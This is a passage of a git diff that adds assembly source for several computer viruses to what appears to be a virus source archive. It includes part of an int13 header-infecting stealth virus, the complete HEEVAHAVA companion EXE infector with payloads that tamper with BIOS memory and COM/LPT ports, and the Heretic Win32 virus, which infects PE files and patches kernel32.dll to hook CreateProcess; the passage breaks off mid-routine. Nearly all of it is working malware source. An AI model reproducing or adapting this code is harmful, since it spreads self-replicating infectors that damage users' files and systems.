je disinfect ;if so, jump to stealth routine + + push ds ;preserve ds + xor di,di ;set di to virus destination + mov ds,di ;set ds to point to INT vector table + cmp byte ptr [040*4+3],0f0 ;int40 still pointing at ROM? + pop ds ;restore ds + jb exit_fail ;if not pointing at ROM, A-V monitor + ; present, so exit + push cx ;preserve cx + call infect ;infect header in buffer + pop cx ;restore cx + jc exit_fail ;if flag=fail, exit + + mov ax,0301 ;write infected header buffer + pushf + call far cs:[offset old13+res_offset] ;do it (call original int13) + +disinfect: + lea si,[bx+offset old_header-com_offset] ;set source for code + lea di,[bx+06] ;set destination + mov cx,old_code_length ;set length of old code to restore + cld ;move direction=forward + rep movsb ;restore original code to header + + xor al,al ;set al=0 + mov cx,viruslength+old_code_length ;set # bytes to overwrite + lea di,[bx+0a0] ;set destination for writes + rep stosb ;overwrite viral code with zeros + +exit_fail: + clc ;clear carry to hide any I/O errors + +exit_int13: + pop ds ;restore registers + pop di + pop si + pop cx + + retf 02 ;return to calling program + +tbdriver_vector_area: + db '=HeaderBug=' ;space filler for TBDriver vector + +write: + mov si,'ZM' ;bytes indicating .EXE header + cmp [bx],si ;.EXE header? + jne chain_old_int13 ;if not, exit + + cmp [bx+014],setver_tag ;is this SETVER's header? + je chain_old_int13 ;if so, exit + + push ax ;preserve ax + call infect ;infect header in buffer + pop ax ;restore ax + +chain_old_int13: + pop ds ;restore registers + pop di + pop si + pop cx + + db 0ea ;"jump far" +old13: + dw 02 dup ? ; to address of orig. int13 routine + +infect: + lea si,[bx+0a0] ;set si=source offset for virus code +zero_test: + mov cx,viruslength+old_code_length ;set scan count to virus length + cld ;set direction of scan=forward +test_byte: + lodsb ;load a byte from area to be scanned + or al,al ;check for zero + loopz test_byte ;if zero, check next byte + or cx,cx ;counted down to zero w/o prior exit? + jz infect_OK ;if so, area is clear to infect + stc ;set "clear-to-infect" flag + ret ;return to calling routine + +infect_OK: + inc ah ;increment ah + jz exit_infect ;true if calling routine=header_entry + mov cl,old_code_length ;length of old header code to preserve + lea si,[bx+06] ;set source for old code + lea di,[bx+offset old_header-com_offset] ;set storage destination + rep movsb ;store old code in virus + + xor ax,ax ;set ax=0 + lea di,[bx+014] ;set destination to cs:ip location + stosw ;set cs:ip values in header to 0:0 + stosw ; by storing zeros in their locations + lea di,[bx+06] ;set destination to # of reloc. items + stosw ;set # of relocation items to zero + mov al,0a ;set header size value to 0ah to + stosw ; place entry point at start of virus + + mov si,start_offset ;set si=start offset of virus + lea di,[bx+0a0] ;set di=destination offset in buffer + +move_it: + push ds ;preserve ds + push cs + pop ds ;set ds=cs + + mov cx,viruslength ;set cx move count to length of virus + cld ;set direction of move to forward + rep movsb ;move virus to header in buffer + + pop ds ;restore ds + +exit_infect: + clc ;clear flag to hide any I/O errors + ret ;return to calling routine + +old_header: + db old_code_length dup ? ;storage area for original header + ; contents +dummy_bytes: + db 0220a dup ? ;dummy bytes used to increase dropper + ; length to avoid detection by f-prot diff --git a/MSDOS/Virus.MSDOS.Unknown.heevahav.asm b/MSDOS/Virus.MSDOS.Unknown.heevahav.asm new file mode 100644 index 00000000..1d9e9802 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.heevahav.asm @@ -0,0 +1,296 @@ +; HEEVAHAV.ASM -- HEEVAHAVA VIRUS +; Created with Nowhere Man's Virus Creation Laboratory v1.00/TASM +; Written by URNST KOUCH +; This is a spawning virus I decided to take to the limit, +; to step on the accelerator of the VCL, so to speak. +; HEEVAHAVA virus is a 'companion' .EXE infector which will attempt +; to infect almost 20 files anywhere on the disk every run. It will mess +; with low RAM, beep the speaker, disable COM port 1, entangle LPT1 and LPT2, +; nullify print screen and finally, when the disk is completely saturated +; with HEEVAHAVA virus it will display the msg, "Only heeva-hava's get stuck +; with the HEEVAHAVA virus!" Note: a 'heevahava' is a Pennsylvania +; Dutch pejorative. Colloquially, it was the name given to the farmhand +; given the job of holding the bull's pecker while semen was collected. + +virus_type equ 2 ; Spawning Virus +is_encrypted equ 0 ; We're not encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near + + mov ah,04Ah ; DOS resize memory function + mov bx,[finish - start / 0282h] ; BX holds # of para. + int 21h + + mov sp,(finish - start) + 01100h ; Change top of stack + + mov si,offset spawn_name ; SI points to true filename + int 02Eh ; DOS execution back-door + push ax ; Save return value for later + + mov ax,cs ; AX holds code segment + mov ds,ax ; Restore data segment + mov es,ax ; Restore extra segment + + mov cx,0013h ; Do 19 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + mov dx,0064h ; First argument is 100 + push es ; Save ES + mov ax,040h ; Set extra segment to 040h + mov es,ax ; (ROM BIOS) + mov word ptr es:[013h],dx ; Store new RAM ammount + pop es ; Restore ES + + mov cx,0005h ; First argument is 5 + jcxz beep_end ; Exit if there are no beeps + mov ax,0E07h ; BIOS display char., BEL +beep_loop: int 010h ; Beep + loop beep_loop ; Beep until --CX = 0 +beep_end: + + push es ; Save ES + mov ax,050h ; Set the extra segement to + mov es,ax ; the BIOS area + mov byte ptr [0000h],1 ; Set print screen flag to + pop es ; "printing," restore ES + + mov si,0001h ; First argument is 1 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl si,1 ; Convert to word index + mov word ptr [si + 03FEh],0 ; Zero COM port address + pop es ; Restore ES + + mov bx,0001h ; First argument is 1 + mov si,0002h ; Second argument is 2 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl bx,1 ; Convert to word index + shl si,1 ; Convert to word index + mov ax,word ptr [bx + 0407h]; Zero COM port address + xchg word ptr [si + 0407h],ax; Put first value in second, + mov word ptr [bx + 0407h],ax; and second value in first! + pop es ; Restore ES + + call infected_all + or ax,ax ; Did the function return zero? + je strt00 ; If equal, do effect + jmp end00 ; Otherwise skip over it +strt00: mov si,offset data00 ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + +end00: pop ax ; AL holds return value + mov ah,04Ch ; DOS terminate function + int 021h +main endp + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + mov dx,offset root ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + mov dx,offset all_files ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + mov dx,offset up_dir ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +exe_mask db "*.EXE",0 ; Mask for all .EXE files +traverse endp + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov di,bx ; DI points to the DTA + + lea si,[di + 01Eh] ; SI points to file name + mov dx,si ; DX points to file name, too + mov di,offset spawn_name + 1; DI points to new name + xor ah,ah ; AH holds character count +transfer_loop: lodsb ; Load a character + or al,al ; Is it a NULL? + je transfer_end ; If so then leave the loop + inc ah ; Add one to the character count + stosb ; Save the byte in the buffer + jmp short transfer_loop ; Repeat the loop +transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count + mov byte ptr [di],13 ; Make CR the final character + + mov di,dx ; DI points to file name + xor ch,ch ; + mov cl,ah ; CX holds length of filename + mov al,'.' ; AL holds char. to search for + repne scasb ; Search for a dot in the name + mov word ptr [di],'OC' ; Store "CO" as first two bytes + mov byte ptr [di + 2],'M' ; Store "M" to make "COM" + + mov byte ptr [set_carry],0 ; Assume we'll fail + mov ax,03D00h ; DOS open file function, r/o + int 021h + jnc infection_done ; File already exists, so leave + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,finish - start ; CX holds virus length + mov dx,offset start ; DX points to start of virus + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +spawn_name db 12,12 dup (?),13 ; Name for next spawn +set_carry db ? ; Set-carry-on-exit flag +infect_file endp + + +infected_all proc near +#if virus_type eq 0 + mov al,byte ptr [di + set_carry] + else + mov al,byte ptr [set_carry] ; AX holds success value +#endif + cbw ; Sign-extend AL into AX + ret ; Return to caller +infected_all endp + +data00 db 7,7,7,7,"Only heeva-hava's get stuck with THE HEEVAHAVA virus!",13,10,0 + +vcl_marker db "HEEVA[VCL]",0 ; VCL creation marker + +finish label near + +code ends + end main + diff --git a/MSDOS/Virus.MSDOS.Unknown.hello.asm b/MSDOS/Virus.MSDOS.Unknown.hello.asm new file mode 100644 index 00000000..b4c6a348 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hello.asm @@ -0,0 +1,10 @@ +; +-------------------------------------------------------------+ ; +; | Sample hello world program for use with the Magic Assembler | ; +; +-------------------------------------------------------------+ ; + mov ah,09 + mov dx,offset(hello) + int 21 + mov ax,4c00 + int 20 + +hello db 'Hello, world!$' diff --git a/MSDOS/Virus.MSDOS.Unknown.heretic.asm b/MSDOS/Virus.MSDOS.Unknown.heretic.asm new file mode 100644 index 00000000..dbce8453 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.heretic.asm @@ -0,0 +1,882 @@ + +; +; SYNOPSIS +; +; Heretic - A Microsoft Windows 32 virus +; +; AUTHOR +; +; Memory Lapse, [NOP] +; formerly of Phalcon/Skism +; +; ABSTRACT +; +; This virus works under all beta versions of Windows 9x, and Windows NT 4.0. +; Under a Win32s environment, the virus will fail since the kernel doesn't +; physically export any useable API. Parsing the import table of the host image +; for GetProcAddress and GetModuleHandle should do the trick. +; +; NOTES +; +; Finally after seven months (including a four month hiatus for university), +; I've finally finished this virus. +; +; Ideally when the kernel is infected, the object the virus extends +; (typically .reloc) should have its flags with IMAGE_SCN_MEM_WRITE turned off. +; This will prevent in-memory patching by antivirus software. Heretic does +; not do this. At least not yet. +; +; Useful reading material: Microsoft Platform, SDK, and DDK Documentation +; +; Greets to priest, h8, lookout, virogen and johnny panic. +; + +.386 +locals +.model flat, stdcall +.code +.radix 16 + +include heretic.inc + +CRC_POLY equ 0EDB88320 +CRC_INIT equ 0FFFFFFFF + +crc macro string + crcReg = CRC_INIT + irpc _x, + ctrlByte = '&_x&' xor (crcReg and 0ff) + crcReg = crcReg shr 8 + rept 8 + ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1)) + endm + crcReg = crcReg xor ctrlByte + endm + dd crcReg +endm + +MARKER equ "DOS lives somewhere in time" + +org 0 + +start: push L offset host - start ;location of old entry point +ddOldEntryPoint = dword ptr $ - 4 + + pushfd ;save state + pushad + + call @@delta +@@delta:pop ebp + sub ebp,offset @@delta - start + ;thanks vg! + db 81,0edh ;sub ebp,unsignedlong +ddEntryPoint dd 0 + add [esp+24],ebp ;return address of host + + mov edi,[esp+28] ;get a "random" pointer from stack + and edi,0FFFF0000 ;mask off bottom word + + call try +catch: mov esp,[esp+8] ;get pointer to our stack-based + ; exception record + jmp finally ;and return to host + +try: push dword ptr fs:[0] ;this is our try { } block + mov fs:[0],esp ;create stack-based exception record + + .repeat + dec edi ;move back a byte + lea eax,[edi-MAGIC] ;thanks h8! + + cmp [edi],eax ;match? then we've found the kernel + .until zero? + + mov esi,[eax+exe_str.pe_offset] + add esi,eax ;traverse PE header and find + ; Export Data Directory Table + mov ebp,[esi+pe_str.export_tbl] + add ebp,eax ;RVA -> absolute + + push eax + push [ebp+edt_str.edt_ord_base] + + mov ebx,[ebp+edt_str.edt_ord_rva] + mov edi,[ebp+edt_str.edt_name_rva] + mov ebp,[ebp+edt_str.edt_addr_rva] + + add ebx,eax ;adjust ordinal table pointer + add edi,eax ;adjust name pointer table pointer + add ebp,eax ;adjust address pointer table pointer + + push ebp ;we save these values onto the stack + push eax ; so we can free up registers + + call @@delta +@@delta:pop ebp + sub ebp,offset @@delta + + push ebp + +; on entry: +; [esp] : delta offset +; [esp+4] : image base +; [esp+8] : address pointer table +; [esp+0c] : ordinal base +; ebx - ordinal table +; esi - pointer to our list of apis +; edi - name pointer table + lea esi,[ebp+name_ptr_api] + mov ecx,1 + mov edx,(name_ptr_api_end - name_ptr_api) / 4 + +top: push edx + push esi + + mov esi,[edi] ;calculate absolute offset of + add esi,[esp+0c] ; name pointer (image base) + + mov edx,CRC_INIT + +lup: lodsb + + or al,al ;termination token? then quit + jz chkCRC + + xor dl,al + mov al,8 + + .repeat ;perform CRC-32 on string + shr edx,1 ;thanks jp! + .if carry? + xor edx,CRC_POLY + .endif + dec al + .until zero? + jmp lup + +chkCRC: pop esi + push edi + + mov ebp,ecx + shl ebp,1 ;convert count into word index + + movzx eax,word ptr [ebx+ebp] ;calculate ordinal index + sub eax,[esp+14] ;relative to ordinal base + shl eax,2 ;convert ordinal into dword index + + mov ebp,eax + mov edi,[esp+10] + + add eax,edi ;calculate offset + mov edi,[edi+ebp] ;RVA of API (dereference said offset) + add edi,[esp+0c] ;convert to absolute offset + + mov ebp,[esp+8] + + cmp edx,CRC_POLY ;CreateProcessA? + org $ - 4 + crc + .if zero? + mov [ebp+lpCreateProcessA],eax ;hook it + mov [ebp+CreateProcessA],edi + .endif + cmp edx,CRC_POLY ;or CreateProcessW? + org $ - 4 + crc + .if zero? + mov [ebp+lpCreateProcessW],eax ;hook it + mov [ebp+CreateProcessW],edi + .endif + cmp edx,[esi] ;or an API the virus uses? + .if zero? + mov [esi+(name_ptr_api_end - name_ptr_api)],edi + lodsd ;update pointer + dec dword ptr [esp+4] ;decrement our API count + .endif + pop edi + +next: pop edx + add edi,4 ;next API + inc ecx ;remember displacement + + or edx,edx ;no more names to parse? + jnz top + + pop ebp ;restore delta offset + add esp,0c ;clear stack + + call [ebp+GlobalAlloc], \ ;allocate memory for global structure + GMEM_FIXED, \ + L size vir_str + + mov edi,eax + pop [edi+vir_str.lpKernelBase] + + call kernel ;attempt to infect the kernel + + call [ebp+GlobalFree], \ ;release global structure resources + edi + +finally:pop dword ptr fs:[0] ;this is our finally { } block + pop eax ;trash exception handler address + ;low and behold, the stack is restored + popad + popfd + + ret + + db '[nop] 4 life.. lapse, vg and jp own you! :)' + +infect: mov [edi+vir_str.ddError],TRUE ;assume an error occurred + + call [ebp+GetFileAttributesA], \ + [edi+vir_str.lpFileName] + + mov [edi+vir_str.ddFilterAttributes],eax + inc eax + jz exit + + call [ebp+SetFileAttributesA], \ ;strip file attributes + [edi+vir_str.lpFileName], \ + FILE_ATTRIBUTE_NORMAL + + or eax,eax ;error? possibly a r/o disk? + jz exit + + call [ebp+CreateFileA], \ + [edi+vir_str.lpFileName], \ + GENERIC_READ or GENERIC_WRITE, \ + FILE_SHARE_NOTSHARED, \ + NULL, \ + OPEN_EXISTING, \ + FILE_ATTRIBUTE_NORMAL, \ + NULL + + mov [edi+vir_str.hFile],eax ;if we don't get a valid file + inc eax ;descriptor (ie. an invalid handle), + jz exitChmod ;quit processing + + lea eax,[edi+vir_str.ddLastWriteTime] + lea ecx,[edi+vir_str.ddLastAccessTime] + lea edx,[edi+vir_str.ddCreationTime] + call [ebp+GetFileTime], \ ;save file timestamps + [edi+vir_str.hFile], \ + edx, \ + ecx, \ + eax + + call [ebp+CreateFileMappingA], \ ;create a mmap object + [edi+vir_str.hFile], \ + NULL, \ + PAGE_READONLY, \ + L 0, \ + L 0, \ + NULL + + or eax,eax + jz exitTime + + mov [edi+vir_str.hFileMappingObject],eax + + call [ebp+MapViewOfFile], \ ;view the file in our address space + [edi+vir_str.hFileMappingObject], \ + FILE_MAP_READ, \ + L 0, \ + L 0, \ + L 0 + + or eax,eax + jz exitCloseMap + + mov [edi+lpBaseAddress],eax + + cmp word ptr [eax],IMAGE_DOS_SIGNATURE + jnz exitUnmap ;some sort of executable? + + mov esi,eax + add esi,[eax+exe_str.pe_offset] ;seek to NT header + + push eax + call [ebp+IsBadCodePtr], \ ;can we read the memory at least? + esi ;potentially not a Windows file? + + or eax,eax + pop eax + jnz exitUnmap + + cmp dword ptr [esi],IMAGE_NT_SIGNATURE + jnz exitUnmap ;PE file? + + cmp [esi+pe_str.timestamp],CRC_POLY + org $ - 4 + crc MARKER + jz exitUnmap + + lea eax,[ebp+infectKernel] + + cmp [edi+vir_str.lpInfectMethod],eax;attempting to infect KERNEL32.DLL? + .if !zero? + test [esi+pe_str.flags],IMAGE_FILE_DLL + jnz exitUnmap ;and not a runtime library? + .endif + call getLastObjectTable + + mov eax,[ebx+obj_str.obj_psize] + add eax,[ebx+obj_str.obj_poffset] + + add eax,(_end - start) ;calculate maximum infected file size + mov ecx,[esi+pe_str.align_file] + call align + + mov [edi+vir_str.ddFileSizeInfected],eax + + call [ebp+UnmapViewOfFile], \ + [edi+vir_str.lpBaseAddress] + + call [ebp+CloseHandle], \ + [edi+vir_str.hFileMappingObject] + + call [ebp+CreateFileMappingA], \ ;reopen and extend mmap file + [edi+vir_str.hFile], \ + NULL, \ + PAGE_READWRITE, \ + L 0, \ + [edi+vir_str.ddFileSizeInfected], \ + NULL + + mov [edi+vir_str.hFileMappingObject],eax + + call [ebp+MapViewOfFile], \ + [edi+vir_str.hFileMappingObject], \ + FILE_MAP_WRITE, \ + L 0, \ + L 0, \ + L 0 + + mov [edi+vir_str.lpBaseAddress],eax + + add eax,[eax+exe_str.pe_offset] + mov esi,eax + + call getLastObjectTable + + mov eax,[ebx+obj_str.obj_rva] ;set new entry point if an EXE + add eax,[ebx+obj_str.obj_psize] ; or set hooks if kernel32.dll + call [edi+vir_str.lpInfectMethod] + + push edi + push esi + + mov edi,[edi+vir_str.lpBaseAddress] + add edi,[ebx+obj_str.obj_poffset] + add edi,[ebx+obj_str.obj_psize] + lea esi,[ebp+start] + mov ecx,(_end - start) + cld + rep movsb ;copy virus + + pop esi + pop eax + + xchg eax,edi + sub eax,[edi+vir_str.lpBaseAddress] ;new psize = old psize + (_end - start) + sub eax,[ebx+obj_str.obj_poffset] + mov ecx,[esi+pe_str.align_file] + call align ;calculate new physical size + + mov [ebx+obj_str.obj_psize],eax + + mov eax,[ebx+obj_str.obj_vsize] + add eax,(_end - start) + mov ecx,[esi+pe_str.align_obj] + call align ;calculate potential new virtual size + + cmp eax,[ebx+obj_str.obj_psize] ;if new physical size > new virtual size + .if carry? + mov eax,[ebx+obj_str.obj_psize] ;then let the virtual size = physical size + .endif + mov [ebx+obj_str.obj_vsize],eax + + add eax,[ebx+obj_str.obj_rva] + + cmp eax,[esi+pe_str.size_image] ;infected host increased in image size? + .if !carry? + mov [esi+pe_str.size_image],eax + .endif + + mov [esi+pe_str.timestamp],CRC_POLY + org $ - 4 + crc MARKER + or [ebx+obj_str.obj_flags],IMAGE_SCN_CNT_INITIALIZED_DATA or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE + + lea eax,[ebp+szImageHlp] + call [ebp+LoadLibraryA], \ ;load image manipulation library + eax + + or eax,eax + .if !zero? + push eax ;(*) argument for FreeLibrary() + + lea ecx,[ebp+szChecksumMappedFile] + call [ebp+GetProcAddress], \ ;get address of image checksum api + eax, \ + ecx + + or eax,eax + .if !zero? + lea ecx,[esi+pe_str.pe_cksum] + lea edx,[edi+vir_str.ddBytes] + call eax, \ ;calculate checksum + [edi+vir_str.lpBaseAddress], \ + [edi+vir_str.ddFileSizeInfected], \ + edx, \ + ecx + .endif + call [ebp+FreeLibrary] ;argument is set at (*) + .endif + mov [edi+vir_str.ddError],FALSE ;no errors! + +exitUnmap: + call [ebp+UnmapViewOfFile], \ ;unmap the view + [edi+vir_str.lpBaseAddress] +exitCloseMap: + call [ebp+CloseHandle], \ ;remove mmap from our address space + [edi+vir_str.hFileMappingObject] +exitTime: + lea eax,[edi+vir_str.ddLastWriteTime] + lea ecx,[edi+vir_str.ddLastAccessTime] + lea edx,[edi+vir_str.ddCreationTime] + call [ebp+SetFileTime], \ ;restore file time + [edi+vir_str.hFile], \ + edx, \ + ecx, \ + eax + + call [ebp+CloseHandle], \ ;close the file + [edi+vir_str.hFile] +exitChmod: + call [ebp+SetFileAttributesA], \ ;restore file attributes + [edi+vir_str.lpFileName], \ + [edi+vir_str.ddFilterAttributes] +exit: ret ;return to caller + +kernel: call [ebp+GlobalAlloc], \ ;allocate memory for source buffer + GMEM_FIXED, \ + _MAX_PATH + + mov [edi+vir_str.lpSrcFile],eax + + call [ebp+GetSystemDirectoryA], \ ;store %sysdir% in source buffer + eax, \ + _MAX_PATH + + call [ebp+GlobalAlloc], \ ;allocate memory for destination buffer + GMEM_FIXED, \ + _MAX_PATH + + mov [edi+vir_str.lpDstFile],eax + + call [ebp+GetWindowsDirectoryA], \ ;store %windir% in destination buffer + eax, \ + _MAX_PATH + + lea eax,[ebp+szKernel] + call [ebp+lstrcatA], \ ;*lpSrcFile = %sysdir%\kernel32.dll + [edi+vir_str.lpSrcFile], \ + eax + + lea eax,[ebp+szKernel] + call [ebp+lstrcatA], \ ;*lpDstFile = %windir%\kernel32.dll + [edi+vir_str.lpDstFile], \ + eax + + call [ebp+CopyFileA], \ + [edi+vir_str.lpSrcFile], \ ;%sysdir%\kernel32.dll + [edi+vir_str.lpDstFile], \ ; -> %windir%\kernel32.dll + FALSE + + lea eax,[ebp+infectKernel] + mov [edi+lpInfectMethod],eax ;we're trying to infect the kernel + + mov eax,[edi+vir_str.lpDstFile] + mov [edi+vir_str.lpFileName],eax + + call infect + + .if [edi+vir_str.ddError] == FALSE + lea eax,[ebp+szSetupApi] + call [ebp+LoadLibraryA], \ + eax + + or eax,eax ;if LoadLibrary fails, explicitly write + .if zero? ;to WININIT.INI (Windows 95) + lea eax,[ebp+szWinInitFile] ;delete the original kernel + push eax + push [edi+vir_str.lpSrcFile] + lea eax,[ebp+szKeyName] + push eax + lea eax,[ebp+szAppName] + push eax + call [ebp+WritePrivateProfileStringA] + + lea eax,[ebp+szWinInitFile] ;move our patched kernel + push eax + push [edi+vir_str.lpDstFile] + push [edi+vir_str.lpSrcFile] + lea eax,[ebp+szAppName] + push eax + call [ebp+WritePrivateProfileStringA] + .else + push eax ;(*) argument for FreeLibrary + + lea ebx,[ebp+szSetupInstallFileExA] ;fetch address of API from this DLL + call [ebp+GetProcAddress], \ + eax, \ + ebx + + or eax,eax + .if !zero? + lea ebx,[edi+ddBytes] + call eax, \ ;move patched kernel + NULL, \ ;NT->delay until next reboot + NULL, \ ; modified MoveFileEx behaviour? + [edi+vir_str.lpDstFile], \ ;98->WININIT.INI + NULL, \ + [edi+vir_str.lpSrcFile], \ + SP_COPY_SOURCE_ABSOLUTE or SP_COPY_DELETESOURCE, \ + NULL, \ + NULL, \ + ebx + .endif + mov esi,eax + call [ebp+FreeLibrary] + mov eax,esi + .endif + or eax,eax + .if zero? + mov [edi+vir_str.ddError],TRUE + .endif + .endif + + .if [edi+vir_str.ddError] == TRUE + call [ebp+DeleteFileA], \ ;delete %windir%\kernel32.dll if + [edi+vir_str.lpFileName] ; an error infecting or moving + .endif + call [ebp+GlobalFree], \ ;deallocate destination buffer + [edi+vir_str.lpDstFile] + + call [ebp+GlobalFree], \ ;deallocate source buffer + [edi+vir_str.lpSrcFile] + ret + +infectKernel: + xchg eax,ecx + + movzx eax,[esi+pe_str.size_NThdr] + add eax,esi + add eax,offset pe_str.majik + + mov edx,0 +lpCreateProcessA = dword ptr $ - 4 + sub edx,[edi+vir_str.lpKernelBase] + +@@lup: cmp [eax+obj_str.obj_rva],edx ;was the API in the previous object? + ja @@next + + add eax,size obj_str ;next object + jmp @@lup + +@@next: sub eax,size obj_str ;seek back to export object + + push L offset hookCreateProcessA - start + call trapAPI + + mov edx,0 +lpCreateProcessW = dword ptr $ - 4 + sub edx,[edi+vir_str.lpKernelBase] + + push L offset hookCreateProcessW - start + call trapAPI + + ret + +infectEXE: + mov [ebp+ddEntryPoint],eax + xchg eax,[esi+pe_str.rva_entry] + + mov [ebp+ddOldEntryPoint],eax + + ret + +trapAPI:push ebx + push ecx + + mov ebx,[eax+obj_str.obj_poffset] + sub ebx,[eax+obj_str.obj_rva] + add ebx,[edi+vir_str.lpBaseAddress] + add ebx,edx + + add ecx,[esp+0c] + mov [ebx],ecx + + pop ecx + pop ebx + ret 4 + +align: xor edx,edx + add eax,ecx + dec eax + div ecx + mul ecx + ret + +getLastObjectTable: + movzx eax,[esi+pe_str.num_obj] + cdq + mov ecx,L size obj_str + dec eax + mul ecx + + movzx edx,[esi+pe_str.size_NThdr] + add eax,edx + add eax,esi + add eax,offset pe_str.majik ;seek to last object table + + xchg eax,ebx + ret + +;on entry: +; [esp] : return address to caller +; [esp+4] -> [esp+28] : registers +; [esp+2c] : return address to process +; [esp+34] : commandline +hookInfectUnicode: + call @@delta +@@delta:pop ebp + sub ebp,offset @@delta + + mov edi,[esp+34] + call [ebp+WideCharToMultiByte], \ ;find out how many bytes to allocate + CP_ACP, \ ; ANSI code page + L 0, \ ; no composite/unmapped characters + edi, \ ; lpWideCharStr + L -1, \ ; calculate strlen(lpWideCharStr)+1 + NULL, \ ; no buffer + L 0, \ ; tell us how many bytes to allocate + NULL, \ ; ignore unmappable characters + NULL ; don't tell us about problems + + or eax,eax ;no bytes can be converted? + jz hookInfectError ;then bomb out. + + push eax ;(*) + + call [ebp+GlobalAlloc], \ ;allocate enough memory for the + GMEM_FIXED, \ ; converted UNICODE string + eax + + or eax,eax ;any memory available? + pop ecx ;(*) + jz hookInfectError + + mov esi,eax + mov edi,[esp+34] + call [ebp+WideCharToMultiByte], \ ;UNICODE -> ANSI conversion + CP_ACP, \ ; ANSI code page + L 0, \ ; no composite/unmappable characters + edi, \ ; lpWideCharStr + L -1, \ ; calculate strlen(lpWideCharStr)+1 + esi, \ ; destination buffer for ANSI characters + ecx, \ ; size of destination buffer + NULL, \ ; ignore unmappable characters + NULL ; don't tell us about problems + jmp hookInfectDispatch + +;on entry: +; [esp] : return address to caller +; [esp+4] -> [esp+28] : registers +; [esp+2c] : return address to process +; [esp+34] : commandline +hookInfectAnsi: + call @@delta +@@delta:pop ebp + sub ebp,offset @@delta + + mov edi,[esp+34] ;get the filename + + call [ebp+lstrlenA], \ ;calculate string length + edi ; (not including null terminator) + + or eax,eax ;zero length? + jz hookInfectError + + inc eax ;include null terminator + + call [ebp+GlobalAlloc], \ ;allocate some memory for the copy + GMEM_FIXED, \ + eax + + or eax,eax ;no memory? + jz hookInfectError + + mov esi,eax + + call [ebp+lstrcpyA], \ ;*edi -> *esi + esi, \ + edi + +hookInfectDispatch: + push esi ;(*) argument for GlobalFree + + call [ebp+GlobalAlloc], \ ;instantiate our global structure + GMEM_FIXED, \ + L size vir_str + + or eax,eax ;fatal error if no memory + jz hookInfectErrorFree + + mov edi,eax + mov [edi+vir_str.lpFileName],esi + mov [edi+vir_str.ddError],FALSE ;assume no parsing fix-ups required + + lodsb + cmp al,'"' + .if zero? + mov [edi+vir_str.lpFileName],esi + mov [edi+vir_str.ddError],TRUE ;parsing fix-ups required + .endif + +hookInfectParse: + lodsb ;get a byte + .if [edi+vir_str.ddError] == TRUE ;need a fix-up? + cmp al,'"' ;'"' is our terminator + jnz hookInfectParse + .else 